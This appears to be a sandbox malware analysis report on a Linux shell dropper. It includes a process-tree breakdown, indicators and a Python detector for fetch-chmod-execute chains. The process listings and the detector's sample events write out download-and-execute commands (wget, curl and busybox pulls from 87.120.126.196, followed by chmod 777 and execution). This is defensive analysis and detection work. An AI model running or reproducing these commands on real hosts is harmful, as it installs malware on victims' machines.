Analysis
-
max time kernel: 32s
max time network: 33s
platform: debian-9_armhf
resource: debian9-armhf-20240418-en
resource tags: arch:armhf, image:debian9-armhf-20240418-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
submitted: 25/10/2024, 01:17
Static task
static1
Behavioral tasks (all four run the same sample, 2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh)
behavioral1  ubuntu1804-amd64-20240611-en
behavioral2  debian9-armhf-20240418-en   (the run shown on this page)
behavioral3  debian9-mipsbe-20240611-en
behavioral4  debian9-mipsel-20240611-en
General
-
Target: 2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh
Size: 10KB
MD5: 5162438af338945d51bf275a08c71d1b
SHA1: 08afc256b7a2d67ce5d019cf6633b8ac69ecf749
SHA256: 2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760
SHA512: f106888effaf28760884756fafc0f9eaa435bcca7312c118cd9de9e6247c65cbc3568f3483e66eb553e80c73a4279c99136513d3500b4b2bef751dc2d1839d32
SSDEEP: 96:XNhHXJX740n2TT9740rA10KKNDcgQ9Jok:XNhHXJ740n2h40X10
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 20 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Process: chmod (one per dropped binary, all "chmod 777 <name>")
PIDs: 675, 681, 688, 702, 744, 767, 782, 792, 798, 804, 810, 818, 824, 830, 836, 842, 850, 856, 865, 871
-
Executes dropped EXE 20 IoCs
PID   Process / IoC path
676   /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC
682   /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe
690   /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB
704   /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3
745   /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl
769   /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV
784   /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr
793   /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr
799   /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC
805   /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm
811   /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff
819   /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp
825   /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV
831   /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad
837   /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad
843   /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff
851   /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp
857   /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV
866   /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3
872   /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl
Six of the 20 executions (PIDs 837, 843, 851, 857, 866, 872) re-run a name that was already fetched and executed earlier in the same run; the script retries those binaries a second time. Every dropped file is removed by rm right after it runs, so none of them remains on disk at the end of the analysis.
-
Checks CPU configuration 1 TTPs 20 IoCs
Checks CPU information, which can indicate whether the system is a virtual machine.
IoC: File opened for reading /proc/cpuinfo. Process: curl. Hit 20 times, once per curl -O invocation.
-
Reads runtime system information 40 IoCs
IoC: File opened for reading /proc/sys/crypto/fips_enabled (20 hits) and /proc/self/auxv (20 hits). Process: curl in every case.
Note for triage: both of these signatures, and "Checks CPU configuration" above, are attributed to the sandbox's own /usr/bin/curl while it downloads the payloads, not to the dropped binaries. Reading /proc/cpuinfo, /proc/self/auxv and /proc/sys/crypto/fips_enabled is ordinary CPU-feature and crypto-library initialization on this platform, so these hits do not by themselves show sandbox evasion by the sample. The MITRE "Virtualization/Sandbox Evasion: System Checks" mapping below rests on these curl reads.
-
System Network Configuration Discovery 1 TTPs 5 IoCs
Adversaries may gather information about the network configuration of a system.
PID   Process
684   wget      (wget http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB)
685   curl      (curl -O of the same URL)
686   busybox   (busybox wget of the same URL)
690   vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB   (the dropped binary itself)
691   rm        (rm vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB)
All five hits belong to the third loop iteration; no other iteration triggered this signature.
-
Writes file to tmp directory 20 IoCs
Malware often drops required files in the /tmp directory.
IoC: File opened for modification /tmp/<name>. Process: curl in every case (curl -O writes the fetched body to the current directory, /tmp).
Names written once: vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB, PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC, fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC, l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe, Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr, EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm, mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr, c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV
Names written twice: ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad, q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff, aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl, yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV, KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp, 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3
Processes
-
Root: /tmp/2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh (depth 1, PID 642)
First child: /bin/rm  "rm bins.sh"  (depth 2, PID 644)

The script then loops over 20 binary names. For every name it spawns the same six children of PID 642, in this order:
  wget      /usr/bin/wget   wget http://87.120.126.196/bins/<name>
  curl      /usr/bin/curl   curl -O http://87.120.126.196/bins/<name>       tags: Checks CPU configuration, Reads runtime system information, Writes file to tmp directory
  busybox   /bin/busybox    /bin/busybox wget http://87.120.126.196/bins/<name>
  chmod     /bin/chmod      chmod 777 <name>                                  tag: File and Directory Permissions Modification
  exec      /tmp/<name>     ./<name>                                          tag: Executes dropped EXE
  rm        /bin/rm         rm <name>
All three fetch methods are tried for each name regardless of whether the previous one succeeded; whichever tool is present on the victim does the download.

PIDs per iteration:

 #   name                                  wget  curl  busybox  chmod  exec  rm
 1   fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC    646   657   673      675    676   677
 2   l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe    678   679   680      681    682   683
 3   vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB    684   685   686      688    690   691
 4   3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3    692   695   700      702    704   705
 5   aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl    706   741   743      744    745   746
 6   c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV    747   748   749      767    769   771
 7   mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr    773   776   780      782    784   785
 8   Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr    786   790   791      792    793   794
 9   PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC    795   796   797      798    799   800
10   EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm    801   802   803      804    805   806
11   q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff    807   808   809      810    811   812
12   KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp    813   814   816      818    819   820
13   yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV    821   822   823      824    825   826
14   ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad    827   828   829      830    831   832
15   ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad    833   834   835      836    837   838
16   q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff    839   840   841      842    843   844
17   KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp    845   847   849      850    851   852
18   yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV    853   854   855      856    857   858
19   3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3    859   863   864      865    866   867
20   aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl    868   869   870      871    872   873

Iteration 3 is the only one whose processes (wget 684, curl 685, busybox 686, the binary itself 690, rm 691) additionally carry the System Network Configuration Discovery tag.
Iterations 15 to 20 repeat names from iterations 14, 11, 12, 13, 4 and 5 respectively.
The captured tree ends with one more fetch after iteration 20: /usr/bin/wget  wget http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV  (depth 2, PID 874). No chmod, execution or rm for it appears in the capture.
Indicators to carry forward: the download host 87.120.126.196 (URL path /bins/<name> over plain HTTP), the 20 dropped file names above, and the execve sequence wget/curl/busybox -> chmod 777 -> ./<name> -> rm under /tmp.
-
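The process tree above is the classic fetch / chmod 777 / execute / rm loop, and the same sequence is what you would look for in execve telemetry from a real host. The following is an added example written for this page, not code from the sandbox or from the sample: it reconstructs those per-name chains from flat (pid, ppid, exe, cmdline) records and pulls out the payload host. The SAMPLE_EVENTS are constructed to mirror two iterations of the tree above (same host, same file names and PIDs) plus one benign download; the benign host mirror.example.org is invented.

```python
"""Detect fetch -> chmod -> execute -> delete chains in process records.

Added example for this report; not code from the sandbox or the sample.
Records are (pid, ppid, executable path, command line) tuples, the shape an
execve audit stream can be reduced to. SAMPLE_EVENTS is constructed here to
mirror two iterations of the report's process tree plus a benign download.
"""
import re
from collections import defaultdict
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s'\"]+")
FETCHERS = {"wget", "curl"}

# Constructed sample, not captured telemetry. mirror.example.org is invented.
SAMPLE_EVENTS = [
    (642, 1, "/tmp/2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh",
     "/tmp/2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh"),
    (644, 642, "/bin/rm", "rm bins.sh"),
    (646, 642, "/usr/bin/wget", "wget http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC"),
    (657, 642, "/usr/bin/curl", "curl -O http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC"),
    (673, 642, "/bin/busybox", "/bin/busybox wget http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC"),
    (675, 642, "/bin/chmod", "chmod 777 fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC"),
    (676, 642, "/tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC", "./fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC"),
    (677, 642, "/bin/rm", "rm fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC"),
    (684, 642, "/usr/bin/wget", "wget http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB"),
    (688, 642, "/bin/chmod", "chmod 777 vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB"),
    (690, 642, "/tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB", "./vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB"),
    (691, 642, "/bin/rm", "rm vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB"),
    # Benign: a download that is never made executable must not be reported.
    (900, 1, "/usr/bin/curl", "curl -O http://mirror.example.org/Release"),
    (901, 1, "/bin/chmod", "chmod 644 Release"),
]


def fetch_target(cmdline):
    """Return (local file name, url) if cmdline is a wget/curl style fetch.

    Handles the busybox applet form ("/bin/busybox wget URL") the script
    uses. Both wget and curl -O save to the URL's last path component.
    """
    argv = cmdline.split()
    if not argv:
        return None
    prog = argv[0].rsplit("/", 1)[-1]
    if prog == "busybox" and len(argv) > 1:
        prog = argv[1]
    if prog not in FETCHERS:
        return None
    m = URL_RE.search(cmdline)
    if not m:
        return None
    name = urlparse(m.group(0)).path.rsplit("/", 1)[-1]
    return (name, m.group(0)) if name else None


def grants_exec(mode):
    """True for chmod modes that add an execute bit (777, 755, +x, a+x)."""
    if mode.isdigit():
        return any(int(d) & 1 for d in mode[-3:])
    return "+x" in mode


def find_drop_chains(events):
    """Group children by parent PID and report every file name that was
    fetched, made executable by chmod and then executed from its own path.
    A following rm of the same name is recorded when present.
    """
    by_parent = defaultdict(list)
    for ev in events:
        by_parent[ev[1]].append(ev)
    chains = []
    for ppid, evs in by_parent.items():
        state = {}  # file name -> chain record
        for pid, _, exe, cmd in sorted(evs):
            argv = cmd.split()
            prog = exe.rsplit("/", 1)[-1]
            fetched = fetch_target(cmd)
            if fetched:
                name, url = fetched
                st = state.setdefault(name, {"parent": ppid, "name": name, "urls": [],
                                             "fetch_pids": [], "chmod": None,
                                             "exec": None, "rm": None})
                st["urls"].append(url)
                st["fetch_pids"].append(pid)
            elif prog == "chmod" and len(argv) >= 3 and argv[-1] in state:
                if grants_exec(argv[1]):
                    state[argv[-1]]["chmod"] = pid
            elif prog in state and state[prog]["chmod"] is not None:
                state[prog]["exec"] = pid  # the dropped file itself ran
            elif prog == "rm" and argv[-1] in state:
                state[argv[-1]]["rm"] = pid
        chains.extend(st for st in state.values() if st["exec"] is not None)
    return chains


def payload_hosts(chains):
    """Distinct hosts the executed payloads were fetched from (network IoCs)."""
    return {urlparse(u).hostname for c in chains for u in c["urls"]}


if __name__ == "__main__":
    found = find_drop_chains(SAMPLE_EVENTS)
    for c in found:
        print(f"parent {c['parent']}: {c['name']} fetched by {c['fetch_pids']}, "
              f"chmod {c['chmod']}, exec {c['exec']}, rm {c['rm']}")
    print("payload hosts:", sorted(payload_hosts(found)))
```

Run against the constructed records it reports the two malicious chains (both fetched from 87.120.126.196) and stays silent on the Release download, because that file was never given an execute bit. The chain is keyed on the file name within one parent, which is what makes the rm-after-exec step harmless for detection: the evidence is in the execve sequence, not on disk.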
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
  File and Directory Permissions Modification (1): Linux and Mac File and Directory Permissions Modification (1)
  Virtualization/Sandbox Evasion (1): System Checks (1)
Downloads
-
Only one downloaded object was captured in this run.
Filesize: 153B
MD5: 998368d7c95ea4293237f2320546e440
SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97